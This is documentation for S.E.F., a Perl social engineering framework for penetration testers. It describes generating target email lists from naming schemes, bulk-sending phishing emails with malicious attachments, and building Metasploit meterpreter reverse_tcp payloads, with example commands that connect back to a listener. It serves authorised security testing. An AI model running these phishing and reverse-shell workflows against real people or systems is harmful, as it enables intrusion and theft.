S.E.F. - Social Engineering Framework

S.E.F. is a framework to make social engineering easier for pentesters. This framework provides several tools to automate many of the mundane tasks that need to be performed when performing social engineering. It includeds the following tools:

  • sefemails - generate a list of email addresses based on a list of names and email scheme
  • sefphish - sending out a large number of phishing emails
  • sefnames - generate a list of names based on email addresses
  • sefpayload - generate a metasploit meterpreter payload

The first step in social engineering is to gather a list of email addresses for your targets. Sefemails can be used to generate email addresses based on email schemes. This is a fair more effective method than scrapping google.

Once you have a list of victims, it is important to have a repeatable process that is flexible for performing phishing attacks. Sefphish uses a configuration file so that the phishing attack can be customized for each target.

Sefpayload and sefnames provide some additonality functionality that maybe helpful depending on your needs. Sefpayload is a tool to generate Metasploit reverse_tcp meterpreter payloads for use during social engineering. Sefnames is a tool to extract names from email addresses.

The documentation for Installation can be found here

sefemails

Description

Tool to generate a list of email addresses based on a list of names and email scheme.

Many people use either google or tools like goog-mail.py or theHarvester to generate email lists when performing a penetration test. However, these tools are not the most effective method to gather email addresses. I have thought about a smarter way to gather email lists. It occurred to me that if you knew the scheme which a company uses to generate the email addresses, you could simply generate email addresses using a list of names.

    [firstname][dot][lastname]          @COMPANY.com
    [firstname][underscore][lastname]   @COMPANY.com
    [firstchar_firstname][lastname]     @COMANY.com

Therefore, instead of scraping google all day, we only need to find a list of names and generate the email address lists ourselves.

Sometimes, we don't know the scheme and therefore, we can attempt a bunch and determine the scheme based on error responses from sending an email.

Examples:

    $ perl sefemails.pl google.com -n names.txt -s 1
    bobbytables@google.com
    johnsmith@google.com
    
    $ perl sefemails.pl google.com -n names.txt -s 3
    bobby_tables@google.com
    john_smith@google.com

Usage:

Options:
    -d   --domain [domain]       Domain
    -n   --names [name list]     File containing list of names
    -s   --scheme [scheme]       Scheme Number(s) (Comma Separated)
    
    -a   --all                   Generate list with all schemes

    -t   --type [number]         Generate list using a specific type
    -g   --group [number]        Generate list with for a specific grouping

    -v   --version               Display version
    -h   --help                  Display this information

    Schemes Examples:
            Scheme                  Separator
            ------                  ----------
            1                       none            (ex: johnsmith@domain)
            2                       dash            (ex: john-smith@domain)
            3                       underscore      (ex: john_smith@domain)
            4                       dot             (ex: john.smith@domain)

            11                      none            (ex: jsmith@domain)
            22                      dash            (ex: j-smith@domain)

            ...  This continues for all the types below    ...

    Schemes Definition:
            Scheme      Group
            1-10        1           firstname lastname
            11-20       2           first_char_firstname lastname
            21-30       3           five_chars_firstname lastname
            31-40       4           five_chars_firstname first_char_lastname

sefphish

Description

Tool for sending out a large number of phishing emails.

This tool provides the ability to send out a large number of phishing emails. It uses a YAML configuration file to make this easier. The config file is included (config.yaml). The configuration file is commented so it will be very easy to modify for your phishing attack. This script sends out email phishing attacks using a csv file as input

Review the configuration file (config.yaml)

Example:

John Smith,jsmith@company.com
Bob Davis,bdavis@company.com
... etc

Features

  • Send emails using your smtp server and/or gmail(via tls)
  • Add attachments to phishing emails
  • Create metasploit payloads on the fly, rename and zip them if needed.
  • Email template files included (pdf,exe and word)
  • Option to add a signature to each phishing email
  • Option to add the target's name to the top of the phishing email
  • Supports text and html

Review the configuration file (config.yaml)

sefnames

Description:

This tool reverses a email addresses and extracts the full name of the victim. It is useful when you have many email addresses that you need to covert to names.

Usage:

    Options:
    -d   --domain [domain]       Domain
    -i   --input [input file]    File containing list of names
    -s   --scheme [scheme]       Scheme Number(s) (Comma Separated)

    -v   --version               Display version
    -h   --help                  Display this information

    Schemes Examples:
            Scheme                  Separator
            ------                  ----------
            1                       dash            (ex: john-smith@domain)
            2                       underscore      (ex: john_smith@domain)
            3                       dot             (ex: john.smith@domain)

sefpayload

Description

Tool to generate a metasploit reverse_tcp meterpreter payload. By default it assumes Metasploit is installed in /pentest/exploits/framework3.

Usage:

ptions:
    -i  --ip [ip]           IP Address of the Metasploit server
    -f  --framework [dir]   Metasploit directory (Default: /pentest/exploits/framework3)
    -p  --port [port]       Port to use for the Metasploit reverse connection (Default: 443)
    -o  --output [output]   Output filename (Default: MS.exe)

    -v  --version           Print version information
    -h  --help              Print help info

Examples:

Generate a metasploit meterpreter reverese_tcp payload with a connect-back to 127.0.0.1 on port 443/tcp.

    $ ./sefpayload -i 127.0.0.1
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

Generate a metasploit meterpreter reverese_tcp payload with a connect-back to 127.0.0.1 on port 53/tcp.

    $ ./sefpayload -i 127.0.0.1 -p 53
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

Generate a metasploit (installed in /opt/metasploit3/msf3) meterpreter reverese_tcp payload with a connect-back to 127.0.0.1 on port 443/tcp.

    $ ./sefpayload -i 127.0.0.1 -f /opt/metasploit3/msf3/
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

Generate a metasploit meterpreter reverese_tcp payload with a connect-back to 127.0.0.1 on port 443/tcp named evil.exe.

    $ ./sefpayload -i 127.0.0.1 -o evil.exe
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

Installation

Quick Install - simply run from this directory

To Install S.E.F. Properly ( make sure you have the needed deps)

  • Net::SMTP
  • Net::SMTP::TLS
  • YAML
  • Net::Cmd
  • Authen::SASL
  • MIME::Lite

To install a module simply execute the following command:

    $ sudo perl -MCPAN -e 'install Net::SMTP'
Once all of the modules are installed simply execute the following commands: 
    perl Makefile.PL
    make
    ** Then as root **
    make install

Version 1.0 can be found here